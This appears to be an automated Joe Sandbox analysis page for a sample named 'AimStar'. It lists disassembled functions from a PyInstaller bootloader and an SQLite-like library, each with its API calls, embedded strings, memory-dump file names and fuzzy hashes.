Function 00007FF8A877B100 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A8779940: 00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87799AD
Part of subcall function 00007FF8A8779940: 00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87799D4

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A877B383
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A877B399

Strings

database corruption, xrefs: 00007FF8A877B1C0
%s at line %d of [%.10s], xrefs: 00007FF8A877B1C7
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A877B1A7

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2830847230-3727861699
Opcode ID: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
Instruction ID: 5e703b82a80ca4699ee9137612b6b7f8685b8a819cb366dc691ef35ea03b8eb2
Opcode Fuzzy Hash: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
Instruction Fuzzy Hash: EA81CF32B0A682ABE7618F25E4447AE77A1FB847C4F448036EB8D47795DF38E485C714

Function 00007FF710F42910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF710F41B6A), ref: 00007FF710F4295E

Strings

Error [ANSI Fallback], xrefs: 00007FF710F429FF
Error, xrefs: 00007FF710F42A0E
%s: %s, xrefs: 00007FF710F429E8
[PYI-%d:ERROR] , xrefs: 00007FF710F42966

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: af6b0c84cf4678254ca775d5ed28f62648ecb21beb9ffa9c9ff33da36e3e42b4
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 0F31B736B1CA8552E710B761A8426E6B298BF887E4F800131EE4D83755DF3CE54AC610

Function 00007FF710F42390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF710F423C8
DialogBoxIndirectParamW.USER32 ref: 00007FF710F4248E
DeleteObject.GDI32 ref: 00007FF710F424C1
DestroyIcon.USER32 ref: 00007FF710F424D3

Strings

Unhandled exception in script, xrefs: 00007FF710F423F8

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction ID: 3f0175d0238b3dbc5c8a090f14237fe98c94a6ffbeae6feca79db69f4f1761d8
Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction Fuzzy Hash: F731733661DE8189EB60EF21E8562F9A3A4FF89794F840135EA4D47B55DF3CE148C720

Function 00007FF710F42B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF710F4918F,?,00007FF710F43C55), ref: 00007FF710F42BA0
MessageBoxW.USER32 ref: 00007FF710F42C2A

Strings

WARNING, xrefs: 00007FF710F42BAF
[PYI-%d:%ls] , xrefs: 00007FF710F42BA8
Warning, xrefs: 00007FF710F42C1D

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 172aa94df94bc69ce49b602b5742859e44903b844107bdb4e256ec977cf9f4b9
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: C3219F7270CF4182E650EB14B8467AAB3A8FB88794F804136EE8D97755DE3CE249C750

Function 00007FF710F42710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF710F41B99), ref: 00007FF710F42760

Strings

Error [ANSI Fallback], xrefs: 00007FF710F427CF
ERROR, xrefs: 00007FF710F4276F
Error, xrefs: 00007FF710F427DE
[PYI-%d:%s] , xrefs: 00007FF710F42768

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 3c69edb76c156c611ccee13237ee720f5e956f80c0562d24120d1e99a6fb098e
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: 89217172A1CB8552E650AB50B8427E6A398BB88794F800131EE8C83759DF7CE289C750

Function 00007FF710F59AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF710F59B1D
GetProcAddress.KERNEL32 ref: 00007FF710F59B33
FreeLibrary.KERNEL32 ref: 00007FF710F59B5A

Strings

mscoree.dll, xrefs: 00007FF710F59B14
CorExitProcess, xrefs: 00007FF710F59B2C

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 72619413d11f2a896fe30922e25daf4f238b0360d91c34131b1b7604a7e68c2a
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 7BF04425B0DE0691FA14AB14E4567759328EF85771F940235D56D463E4DF2CF28CC320

Function 00007FF710F693D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF710F69400
_set_statfp.LIBCMT ref: 00007FF710F6941B
_set_statfp.LIBCMT ref: 00007FF710F69437
_set_statfp.LIBCMT ref: 00007FF710F69473

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: f4721a673b98db7797d5913a70fc1859a576ca3f134d3f79da407c4c856ce546
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 1511917AE5CE1301FA54B124E4573F5A04CEF99374F848634EA7E063DACE2CB94AD224

Function 00007FF710F5B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B41F
FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B43E
FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B466
FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B477
FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B488

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction ID: cb56a1f8abd9fb011eb0640d0143788b324f4ab81b2fa80e5d6d664f2249befb
Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction Fuzzy Hash: 72116A20A0CE0641FA68FB215653179E16A5F847B0FD88334E93E467D7DE2CB649C721

Function 00007FF710F5B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF710F5B2A5
FlsSetValue.KERNEL32 ref: 00007FF710F5B2C4
FlsSetValue.KERNEL32 ref: 00007FF710F5B2EC
FlsSetValue.KERNEL32 ref: 00007FF710F5B2FD
FlsSetValue.KERNEL32 ref: 00007FF710F5B30E

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction ID: a465283edfeb73a356b6bfc112ddec59a253b4987a0840e85d6d0cb3dee9598d
Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction Fuzzy Hash: 85110620A0CA0A41F959B721441717991694F49370FC84774E93E5A3C3DD2CB60DC732

Function 00007FF8A87D97D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 288COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FF8A87DA007,?,00000007,?), ref: 00007FF8A87D9997

Strings

rowid, xrefs: 00007FF8A87D9928
%.*z:%u, xrefs: 00007FF8A87D9A66
column%d, xrefs: 00007FF8A87D99A5

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %.*z:%u$column%d$rowid
API String ID: 2830847230-2903559916
Opcode ID: a21a639f670ee7c7088fbac57dc44845181275f4fd98a2d4173d5ea1f5654c93
Instruction ID: 5d8dafd230e42de67bb7b00e03920f381faf1765ef949c5cff2b1517626c6433
Opcode Fuzzy Hash: a21a639f670ee7c7088fbac57dc44845181275f4fd98a2d4173d5ea1f5654c93
Instruction Fuzzy Hash: 43B1EF22A4B682A5FA659B1594403BA6BE0EF91FD4F499135CE4D073C5EF3CE401CF28

Function 00007FF710F56010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F56176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5622C

Strings

verbose, xrefs: 00007FF710F56020

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: cf552a08f4a76e8837201d6e5e0f8f94e690cbd1a24550d90857e6695f15bee9
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 8391CF32A0CE4641FB60AE25E45237DB2B9AB49BA4FC44136DA69433D5DF3CF649C321

Function 00007FF8A87E8620 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FF8A87E8AEF), ref: 00007FF8A87E87B9
00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FF8A87E8AEF), ref: 00007FF8A87E883B
00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FF8A87E8AEF), ref: 00007FF8A87E892D

Strings

RETURNING may not use "TABLE.*" wildcards, xrefs: 00007FF8A87E86A1

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: RETURNING may not use "TABLE.*" wildcards
API String ID: 2830847230-2313493979
Opcode ID: f63cdbfc781e1cc30f49cfbae50e1d6ec23c96147ccc90fbb7ff98d4043e38b1
Instruction ID: 165122c6c9b52428059f62afd3c75660ae77a15ddb0eaa4e9251d4c01e944f09
Opcode Fuzzy Hash: f63cdbfc781e1cc30f49cfbae50e1d6ec23c96147ccc90fbb7ff98d4043e38b1
Instruction Fuzzy Hash: 37B1D222A4AB8196E720CF25D4802B977A1FB55BE4F098335DEAD077D5EF38E4A1C314

Function 00007FF8A879D460 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF8A87978D7), ref: 00007FF8A879D5BA
00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF8A87978D7), ref: 00007FF8A879D5E4
00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF8A87978D7), ref: 00007FF8A879D637

Strings

H, xrefs: 00007FF8A879D5CE

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: H
API String ID: 2830847230-2852464175
Opcode ID: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
Instruction ID: cf2e8f07e34652d680e59f9f0dfd5f21ec6b05b51277f5f110c5f9882ad74cb3
Opcode Fuzzy Hash: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
Instruction Fuzzy Hash: 4791C062A4AA4196EBA4CE2594407797FA0FB44BD4F144634DF9D47BD4CF3CE4108B18

Function 00007FF710F5FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5FF17

Part of subcall function 00007FF710F57AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F57AC9

Strings

UTF-16LEUNICODE, xrefs: 00007FF710F5FEB5
ccs, xrefs: 00007FF710F5FE52
UTF-8, xrefs: 00007FF710F5FE96

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 464900c6e3015259887501c3b5b433c8ee56b0ee9584e896a8ad368fe9974a98
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 5081D432D0CA0386F7647E258107278BAB8AB11768FD58075DA0987799CB2DFB0DC361

Function 00007FF8A87D9470 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON

Download Yara Rule

Strings

rowid, xrefs: 00007FF8A87D95CE
column%d, xrefs: 00007FF8A87D9678
%s.%s, xrefs: 00007FF8A87D95EE

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID:
String ID: %s.%s$column%d$rowid
API String ID: 0-1505470444
Opcode ID: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
Instruction ID: a7828c91049563867f20f0d7fb4c3050bddc399469824536e22fc8cd61e9f7e4
Opcode Fuzzy Hash: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
Instruction Fuzzy Hash: FB91A932A0AB81A5EB20DB25D4443A967A4FB45BF4F044336DABC073D5EF38E041CB14

Function 00007FF8A8778A30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON

Download Yara Rule

Strings

database corruption, xrefs: 00007FF8A8778AEF
%s at line %d of [%.10s], xrefs: 00007FF8A8778AF6
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A8778ADC

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 0-3727861699
Opcode ID: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
Instruction ID: a4f7f851bc72d7d3c9697b40f1e219e0ec7e7d40baed133cacba07264b26e5f4
Opcode Fuzzy Hash: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
